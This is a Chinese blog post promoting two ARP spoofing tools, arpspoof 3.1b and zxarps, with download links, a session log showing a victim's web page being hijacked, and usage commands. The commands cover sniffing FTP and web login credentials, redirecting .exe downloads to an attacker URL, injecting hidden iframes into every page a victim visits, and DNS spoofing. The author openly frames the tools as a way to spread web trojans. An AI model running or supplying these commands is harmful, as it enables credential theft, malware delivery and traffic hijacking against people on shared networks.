最近幻影的两个ARP欺骗工具 挺不错的

               

 arpspoof 3.1b

主要功能:ARP欺骗过程中进行数据修改,实现会话劫持攻击
说明: 本程序公开源代码,为了换取更多朋友的指教

实例: 欺骗192.168.0.108访问百度网站的全过程(注:#后是我加的注释)
效果: 192.168.0.108看到的百度首页只有一句话“Hack by cooldiyer”,攻击成功。
图解:
__________________________________________________________________________________
F:/arpspoof/Release>arpspoof /n
ARPSpoof 3.1b by CoolDiyer 06-10-30
[+] Replace Job file job.txt release success... # 利用程序自动生成的规则文件,就能搞定

F:/arpspoof/Release>arpspoof 192.168.0.1 192.168.0.108 80 2 1 /r job.txt
ARPSpoof 3.1b by CoolDiyer 06-10-30
[*] Parsing rul <hea ==> Hack by cooldiyer<noframes> # 程序加载文件job.txt中的规则,可用arpspoof /n生成模板
[*] Parsing rul <HEA ==> Hack by cooldiyer<noframes>
[+] Loaded 2 rules... # 共加载了两条规则,如果文件格式不对,程序在这里会中断
[*] Spoofing 192.168.0.1 <-> 192.168.0.108 # 开始arpspoof欺骗,监视转发的数据包
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80 # 程序捕捉到了一个需要转发的数据包,但没找到要替换的字符串
[*] Forwarding untouched packet of size 62 # 所以直接转发出去,以下几个也是
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # ............
[*] Forwarding untouched packet of size 62
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 399
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304 # 程序捕捉到了一个需要转发的数据包,找到了要替换的内容,应用规则。
Applying rul <hea ==> Hack by cooldiyer<noframes> # 把“<hea”替换成了“Hack by cooldiyer<noframes>”
[*] Done 1 replacements, forwarding packet of size 1474 # 给出提示这个数据包被替换了多少次,替换后包的大小 (调试用的)
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 1474
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Caught 202.108.22.43:80 -> 192.168.0.108:4304
[*] Forwarding untouched packet of size 237
[+] Caught 192.168.0.108:4304 -> 202.108.22.43:80
[*] Forwarding untouched packet of size 60
[+] Reseting ..... # Ctrl+C,程序自动恢复受骗主机的ARP缓存
[-] Sleep 5s ............ # 5秒退出
__________________________________________________________________________________

其它说明:
arpspoof 192.168.0.1 192.168.0.108 80 2 1 /s sniff.log
可保存数据到文件,
arpspoof 192.168.0.1 192.168.0.108 80 2 1
只显示数据
被替换的字符串要尽可能的短,这样能减少程序负担,可参考arpspoof /n生成的规则文件job.txt
需要说的是程序在公网下照样使用,我已经解说过了,不再举例.........
规则文件的使用可以看程序的书写,本程序开放源代码
希望测试出更多Bug, 我努力更新。。
By CoolDiyer 2006-11-12

下载:http://allyesno.gbaopan.com/files/127df7d9d1ee441d9994959af8e24c21.gbp

zxarps

在当今网马横飞的日子,我帖个东东,让网马飞得更猛烈些吧

说明:
需要winPcap
基于arp欺骗,
具体功能看下面的使用说明~~~懒得打太多字了~~~

一些注意:
通常欺骗都是针对 网关和同网段下的其他机,所以-sethost [ip] 参数可以不填,
但如果同网段下有某server,而你想嗅探其他用户到该server的数据就要-sethost serverIP

Codz:

       

0. Realtek RTL8139

    IP Address
. . . . . : 192.168.1.101

    Physical Address
. . : 00-11-D8-6B-5E-19

    
Default Gateway . . : 192.168.1.1



1. WAN
(PPP/SLIP) Interface

    IP Address
. . . . . : xx.xx.xx.xx

    Physical Address
. . : 00-52-00-00-00-00

    
Default Gateway . . : xx.xx.xx.xx

options
:

    -
idx [index]       网卡索引号

    
-ip [ip]           欺骗的IP,'-'指定范围,','隔开

    
-sethost [ip]      默认是网关,可以指定别的IP

    
-port [port]       关注的端口,'-'指定范围,','隔开,没指定默认关注所有端口

    
-reset             恢复目标机的ARP表

    
-hostname          探测主机时获取主机名信息

    
-logfilter [string]设置保存数据的条件,必须+-_做前缀,后跟关键字,

                       
','隔开关键字,多个条件'|'隔开

                       所有带
+前缀的关键字都出现的包则写入文件

                       带
-前缀的关键字出现的包不写入文件

                       带_前缀的关键字一个符合则写入文件
(如有+-条件也要符合)

    -
save_a [filename] 将捕捉到的数据写入文件 ACSII模式

    
-save_h [filename] HEX模式



    
-hacksite [ip]     指定要插入代码的站点域名或IP,

                       
多个可用','隔开,没指定则影响所有站点

    
-insert [html code]指定要插入html代码



    
-postfix [string]  关注的后缀名,只关注HTTP/1.1 302

    
-hackURL [url]     发现关注的后缀名后修改URL到新的URL

    
-filename [name]   新URL上有效的资源文件名



    
-hackdns [string]  DNS欺骗,只修改UDP的报文,多个可用','隔开

                       格式
: 域名|IP,www.aa.com|222.22.2.2,www.bb.com|1.1.1.1



    
-Interval [ms]     定时欺骗的时间间隔,单位:毫秒:默认是3000 ms

    
-spoofmode [1|2|3] 将数据骗发到本机,欺骗对象:1为网关,2为目标机,3为两者(默认)

    -
speed [kb]        限制指定的IP或IP段的网络总带宽,单位:KB



example
:

    
嗅探指定的IP段中端口80的数据,并以HEX模式写入文件

    zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -save_h sniff.log



    FTP嗅探
,在21或2121端口中出现USER或PASS的数据包记录到文件

    zxarps
.exe -idx 0 -ip 192.168.0.2 -port 21,2121 -spoofmode 2 -logfilter "_USER ,_PASS" -save_a sniff.log



    HTTP web邮箱登陆或一些论坛登陆的嗅探
,根据情况自行改关键字

    zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.50 -port 80 -logfilter "+POST ,+user,+pass" -save_a sniff.log



    用
|添加嗅探条件,这样FTP和HTTP的一些敏感关键字可以一起嗅探

    zxarps
.exe -idx 0 -ip 192.168.0.2 -port 80,21 -logfilter "+POST ,+user,+pass|_USER ,_PASS" -save_a sniff.log



    如果嗅探到目标下载文件后缀是exe等则更改Location
:为http://xx.net/test.exe

    
zxarps.exe -idx 0 -ip 192.168.0.2-192.168.0.12,192.168.0.20-192.168.0.30 -spoofmode 3 -postfix ".exe,.rar,.zip" -hackurl http://xx.net/ -filename test.exe



    
指定的IP段中的用户访问到-hacksite中的网址则只显示just for fun

    zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -hacksite 222.2.2.2,www.a.com,www.b.com -insert "just for fun<noframes>"



    
指定的IP段中的用户访问的所有网站都插入一个框架代码

    zxarps
.exe -idx 0 -ip 192.168.0.2-192.168.0.99 -port 80 -insert "<iframe src='xx' width=0 height=0>"



    
指定的两个IP的总带宽限制到20KB

    zxarps
.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -speed 20



    DNS欺骗

    zxarps
.exe -idx 0 -ip 192.168.0.55,192.168.0.66 -hackdns "www.aa.com|222.22.2.2,www.bb.com|1.1.1.1"



zxarps Build 01/19/2007 By LZX.

 

下载:http://allyesno.gbaopan.com/files/caef438cb81649dda7da376e515be0b7.gbp

           

再分享一下我老师大神的人工智能教程吧。零基础!通俗易懂!风趣幽默!还带黄段子!希望你也加入到我们人工智能的队伍中来!https://blog.csdn.net/jiangjunshow

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值